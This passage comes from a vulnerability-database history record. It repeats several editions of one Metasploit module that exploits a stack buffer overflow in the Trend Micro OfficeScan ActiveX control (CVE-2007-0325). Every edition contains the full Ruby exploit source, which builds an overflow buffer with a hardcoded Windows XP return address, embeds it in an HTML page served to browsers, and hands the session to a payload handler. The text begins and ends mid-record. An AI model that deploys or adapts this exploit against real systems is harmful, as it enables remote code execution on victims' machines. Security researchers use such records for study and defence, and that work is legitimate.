things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-30T21:38:41", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-31T01:41:35", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-31T01:41:35", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-11-20T15:07:43", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-11-20T15:07:43", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-11-20T16:07:36", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2017-11-20T16:07:36"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-11-20T16:07:36", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-01-16T18:13:58", "history": [], "viewCount": 0, "enchantments": {"score": {"value": null, "modified": "2018-01-16T18:13:58"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-01-16T18:13:58", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-01-17T00:11:50", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-01-17T00:11:50"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-01-17T00:11:50", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-01-30T12:11:47", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-01-30T12:11:47"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-01-30T12:11:47", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-01-30T14:10:10", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-01-30T14:10:10"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-01-30T14:10:10", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-01T06:09:52", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-02-01T06:09:52"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2018-02-01T06:09:52", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-02-01T14:10:20", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 10.0, "modified": "2018-02-01T14:10:20"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' 